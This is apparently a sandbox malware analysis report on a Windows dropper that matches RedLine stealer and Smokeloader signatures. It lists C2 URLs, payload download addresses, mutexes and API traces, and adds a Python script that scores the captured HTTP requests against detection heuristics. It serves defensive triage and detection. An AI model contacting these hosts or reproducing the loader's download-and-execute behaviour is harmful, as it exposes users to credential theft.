Source: ssB9bjDQPf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49724 version: TLS 1.2
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02528C59 FindFirstFileExW,0_2_02528C59
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02491EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_02491EA7
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0249CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_0249CF47
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02493F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02493F27
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0248DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_0248DFD7
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02481807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_02481807
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02481820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,3_2_02481820
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02491827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02491827
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0249D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_0249D8A7
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0249E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,3_2_0249E0B7
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_02495127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,3_2_02495127
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0249E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,3_2_0249E597

Networking

Source: Malware configuration extractor | URLs: http://92.255.57.89/45c616e921a794b8.php
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 17:58:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Tue, 10 Dec 2024 17:45:01 GMT ETag: "4a600-628ee0a60051e" Accept-Ranges: bytes Content-Length: 304640 Content-Type: application/x-msdos-program
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 92.255.57.89 Connection: Keep-Alive Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 172.67.179.207
Source: Joe Sandbox View | ASN Name: TELSPRU
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49725 -> 176.113.115.19:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49724 -> 172.67.179.207:443
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1; User-Agent: ShareScreen; Host: post-to-me.com
Source: global traffic | HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1; User-Agent: ShareScreen; Host: 176.113.115.19
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1; Host: 92.255.57.89; Connection: Keep-Alive; Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: post-to-me.com
Source: ssB9bjDQPf.exe, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: ssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exex
Source: 8DF0.tmp.exe, 00000003.00000002.1833877398.000000000091E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.89
Source: 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000985000.00000004.00000020.00020000.00000000.sdmp, 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.89/
Source: 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000985000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.89/A
Source: 8DF0.tmp.exe, 00000003.00000002.1833942307.0000000000948000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.89/T
Source: 8DF0.tmp.exe, 00000003.00000002.1833877398.000000000091E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.89=8P
Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/
Source: ssB9bjDQPf.exe | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: ssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE_
Source: ssB9bjDQPf.exe, 00000000.00000002.3903090132.0000000000B70000.00000004.00000020.00020000.00000000.sdmp, ssB9bjDQPf.exe, 00000000.00000003.3781580190.0000000000B70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEu
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49724 version: TLS 1.2
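The three requests above, taken together, are the network signature of this chain: a tracker hit on post-to-me.com with the non-browser User-Agent "ShareScreen", a plain-HTTP download of ScreenUpdateSync.exe from a bare IP that no DNS query preceded, and a header-less GET / to a second bare IP with Cache-Control: no-cache, which is how the dropped 8DF0.tmp.exe reaches its server. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it rebuilds those three requests as constructed strings from the lines above, parses them, and scores each against heuristics derived from this report. The known-bad User-Agent list, the executable-extension pattern and the "beacon-like" rule are assumptions chosen for illustration, not a vetted detection set, and the script runs offline.

```python
import ipaddress
import re

# Constructed from the three HTTP requests listed in the report above; this is
# not a capture file, and the header order is the one the sandbox printed.
SAMPLE_REQUESTS = [
    "GET /track_prt.php?sub=0&cc=DE HTTP/1.1\r\n"
    "User-Agent: ShareScreen\r\nHost: post-to-me.com\r\n\r\n",
    "GET /ScreenUpdateSync.exe HTTP/1.1\r\n"
    "User-Agent: ShareScreen\r\nHost: 176.113.115.19\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 92.255.57.89\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
]

# Assumed indicator lists: the User-Agent value comes from this report, the
# rest is generic triage logic that would be tuned per environment.
SUSPECT_USER_AGENTS = {"sharescreen"}
EXECUTABLE_TARGET = re.compile(r"\.(exe|dll|scr|msi|ps1|bat)(\?|$)", re.IGNORECASE)


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, target, lower-cased header dict)."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:                      # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_bare_ip(host: str) -> bool:
    """True when the Host header is a literal IP, i.e. no DNS lookup could have preceded it."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def score_request(raw: str):
    """Return (host, [reasons]) for one request; an empty list means nothing fired."""
    method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    ua = headers.get("user-agent", "")
    reasons = []
    if not ua:
        reasons.append("no User-Agent header")
    elif ua.lower() in SUSPECT_USER_AGENTS:
        reasons.append(f"known-bad User-Agent {ua!r}")
    if is_bare_ip(host):
        reasons.append("Host is a bare IP (no DNS query precedes the connection)")
    if EXECUTABLE_TARGET.search(target):
        reasons.append("executable fetched over plain HTTP")
    if (method == "GET" and target == "/" and not ua
            and headers.get("cache-control", "").lower() == "no-cache"):
        reasons.append("header-less root GET with no-cache (beacon-like)")
    return host, reasons


def triage(requests=SAMPLE_REQUESTS):
    """Map each Host value to the list of reasons its request was flagged."""
    return dict(score_request(r) for r in requests)


if __name__ == "__main__":
    for host, reasons in triage().items():
        print(f"{host:20} {'; '.join(reasons) or 'clean'}")
```

Run it as is to see the three sample requests scored, or feed `score_request` raw requests exported from a proxy or IDS. The bare-IP rule on its own is noisy where internal services are reached by address, so treat the reasons as additive and alert when two or more fire for the same host.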
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep (listed three times in the report)
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_024F1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_004097A0 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop

System Summary

Source: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_024F2361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_024F2605 NtdllDefWindowProc_W,PostQuitMessage
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00428022
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004071AB
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004373D9
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0042D4EE
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00427484
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00428560
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0043D678
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004166AF
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00413725
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_004277F6
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0040E974
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0042EAE0
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00427AA0
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00418AAF
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00436CBF
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00427D67
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00413F0B
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02518289
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0251ED47
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02504172
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_025176EB
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0251D755
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_025187C7
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02517A5D
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_024FEBDB
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02506916
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_0250398C
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02526F26
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02517FCE
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02508D16
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_02517D07
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_024A4B37
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: String function: 02500987 appears 53 times
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: String function: 00410720 appears 53 times
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: String function: 0040F903 appears 36 times
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: String function: 0040FDB2 appears 125 times
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: String function: 02500019 appears 121 times
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: String function: 00404980 appears 317 times
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 1304
Source: ssB9bjDQPf.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 8DF0.tmp.exe.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ssB9bjDQPf.exe | Binary or memory string: OriginalFileName vs ssB9bjDQPf.exe
Source: ssB9bjDQPf.exe, 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs ssB9bjDQPf.exe
Source: ssB9bjDQPf.exe, 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs ssB9bjDQPf.exe
Source: ssB9bjDQPf.exe, 00000000.00000003.1476873599.0000000002560000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs ssB9bjDQPf.exe
Source: ssB9bjDQPf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: ssB9bjDQPf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 8DF0.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@1/3
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Code function: 0_2_00AF9FB6 CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Code function: 3_2_0249CE47 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1280
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | File created: C:\Users\user\AppData\Local\Temp\8DF0.tmp
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ssB9bjDQPf.exe | ReversingLabs: Detection: 44%
Source: unknown | Process created: C:\Users\user\Desktop\ssB9bjDQPf.exe "C:\Users\user\Desktop\ssB9bjDQPf.exe"
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Process created: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe "C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\8DF0.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 1304
Source: C:\Users\user\Desktop\ssB9bjDQPf.exe | Sections loaded (in load order): apphelp.dll, msimg32.dll, wininet.dll, msvcr100.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, uxtheme.dll, propsys.dll, windows.staterepositoryps.dll, edputil.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
